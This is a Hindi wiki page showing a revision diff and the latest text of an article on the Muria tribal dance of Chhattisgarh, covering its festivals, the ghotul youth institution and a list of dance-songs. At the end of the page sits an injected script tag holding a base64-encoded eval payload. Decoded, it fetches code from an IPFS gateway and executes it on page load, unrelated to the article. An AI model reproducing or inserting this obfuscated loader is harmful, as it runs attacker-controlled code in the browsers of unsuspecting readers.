Difference between revisions of "मुरिया नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मुरिया नृत्य''' छत्तीसगढ़ राज्य में निवास करने वाल...' के साथ नया पन्ना बनाया)
 
m (श्रेणी:संस्कृति (को हटा दिया गया हैं।))
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 +
[[चित्र:Muria-Dance.jpg|thumb|250px|मुरिया नृत्य, [[छत्तीसगढ़]]]]
 
'''मुरिया नृत्य''' [[छत्तीसगढ़]] राज्य में निवास करने वाली मुरिया जनजाति द्वारा किया जाता है। मुरिया लोगों के मुख्य पर्व और त्योहारों में नवाखनी, चाड़ जात्रा और सेशा आदि प्रमुख हैं। इन लोगों के [[कला]] रूपों में मुख्य रूप से गीत नृत्य शामिल हैं। प्रत्येक व्यक्ति नृत्य के साथ-साथ नृत्य गीत में भी पारंगत होता है। अधिकतर [[नृत्य]] गीत किसी न किसी रीति-रिवाज या मान्यताओं से जुड़े होते हैं।
 
'''मुरिया नृत्य''' [[छत्तीसगढ़]] राज्य में निवास करने वाली मुरिया जनजाति द्वारा किया जाता है। मुरिया लोगों के मुख्य पर्व और त्योहारों में नवाखनी, चाड़ जात्रा और सेशा आदि प्रमुख हैं। इन लोगों के [[कला]] रूपों में मुख्य रूप से गीत नृत्य शामिल हैं। प्रत्येक व्यक्ति नृत्य के साथ-साथ नृत्य गीत में भी पारंगत होता है। अधिकतर [[नृत्य]] गीत किसी न किसी रीति-रिवाज या मान्यताओं से जुड़े होते हैं।
 
 
*मुरिया जाति को 'घोटुल' के कारण भी जाना जाता है। घोटुल मुरिया युवकों की एक संगठन व्यवस्था का नाम है।
 
*मुरिया जाति को 'घोटुल' के कारण भी जाना जाता है। घोटुल मुरिया युवकों की एक संगठन व्यवस्था का नाम है।
 
*घोटुल एक प्रकार का प्रशिक्षण केन्द्र होता है। इसके सदस्य घोटुल में और घोटुल के बाहर भी नृत्य गीत प्रस्तुत करने जाते हैं।
 
*घोटुल एक प्रकार का प्रशिक्षण केन्द्र होता है। इसके सदस्य घोटुल में और घोटुल के बाहर भी नृत्य गीत प्रस्तुत करने जाते हैं।
 
*मुरिया लोगो के मुख्य पर्व-त्यौहारों में नवाखनी, चाड़ जात्रा और सेशा मुख्य रूप से प्रमुख हैं।
 
*मुरिया लोगो के मुख्य पर्व-त्यौहारों में नवाखनी, चाड़ जात्रा और सेशा मुख्य रूप से प्रमुख हैं।
 
*प्रत्येक नृत्य गीत किसी न किसी रीति-रिवाज, मान्यता अथवा सामाजिक धार्मिक उत्सव से अवश्य जुडे़ होते हैं और लगभग प्रत्येक नृत्य गीत से पूरा समुदाय सम्बद्ध होता है।
 
*प्रत्येक नृत्य गीत किसी न किसी रीति-रिवाज, मान्यता अथवा सामाजिक धार्मिक उत्सव से अवश्य जुडे़ होते हैं और लगभग प्रत्येक नृत्य गीत से पूरा समुदाय सम्बद्ध होता है।
*दीवाड़ पाटा, चेरहे पाटा, चेतांग पाटा, डीमके पाटा, पारी पाटा, माओ पाटा, डोल पाटा, ककसार पाटा, गोटुल पाटा, कोडा पाटा, हुलकी पाटा, कोलांग पाटा, डिटींग पाटा आदि [[नृत्य]] गीत विभिन्न अवसरों पर मुरिया लोगों के प्रमुख नृत्य गीतों में से हैं।
+
*दीवाड़ पाटा, चेरहे पाटा, चेतांग पाटा, डीमके पाटा, पारी पाटा, माओ पाटा, डोल पाटा, ककसार पाटा, गोटुल पाटा, कोडा पाटा, हुलकी पाटा, कोलांग पाटा, डिटींग पाटा आदि [[नृत्य]] गीत विभिन्न अवसरों पर मुरिया लोगों के प्रमुख नृत्य गीतों में से हैं।<ref>{{cite web |url=http://sczcc.gov.in/CG/InternalPage.aspx?Antispam=aOVv2ZXPBd4&ContentID=76&MyAntispam=ZJhp45i4l15 |title=लोक नृत्य |accessmonthday=13 मार्च|accessyear=2012|last= |first= |authorlink= |format= |publisher= |language=[[हिन्दी]]}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 11: Line 11:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{छत्तीसगढ़ के नृत्य}}
 
{{नृत्य कला}}
 
{{नृत्य कला}}
 +
[[Category:छत्तीसगढ़ राज्य]][[Category:छत्तीसगढ़ के नृत्य]]
 +
[[Category:छत्तीसगढ़ राज्य की संस्कृति]]
 +
[[Category:नृत्य कला]]
 
[[Category:संस्कृति कोश]]
 
[[Category:संस्कृति कोश]]
 
[[Category:कला कोश]]
 
[[Category:कला कोश]]
[[Category:छत्तीसगढ़ राज्य की संस्कृति]]
 
[[Category:नृत्य कला]]
 
[[Category:संस्कृति]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 07:28, 17 July 2014

[[chitr:Muria-Dance.jpg|thumb|250px|muriya nrity, chhattisagadh]] muriya nrity chhattisagadh rajy mean nivas karane vali muriya janajati dvara kiya jata hai. muriya logoan ke mukhy parv aur tyoharoan mean navakhani, cha d jatra aur sesha adi pramukh haian. in logoan ke kala roopoan mean mukhy roop se git nrity shamil haian. pratyek vyakti nrity ke sath-sath nrity git mean bhi parangat hota hai. adhikatar nrity git kisi n kisi riti-rivaj ya manyataoan se ju de hote haian.

  • muriya jati ko 'ghotul' ke karan bhi jana jata hai. ghotul muriya yuvakoan ki ek sangathan vyavastha ka nam hai.
  • ghotul ek prakar ka prashikshan kendr hota hai. isake sadasy ghotul mean aur ghotul ke bahar bhi nrity git prastut karane jate haian.
  • muriya logo ke mukhy parv-tyauharoan mean navakhani, cha d jatra aur sesha mukhy roop se pramukh haian.
  • pratyek nrity git kisi n kisi riti-rivaj, manyata athava samajik dharmik utsav se avashy jude़ hote haian aur lagabhag pratyek nrity git se poora samuday sambaddh hota hai.
  • diva d pata, cherahe pata, chetaang pata, dimake pata, pari pata, mao pata, dol pata, kakasar pata, gotul pata, koda pata, hulaki pata, kolaang pata, ditiang pata adi nrity git vibhinn avasaroan par muriya logoan ke pramukh nrity gitoan mean se haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. lok nrity (hindi). . abhigaman tithi: 13 march, 2012.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>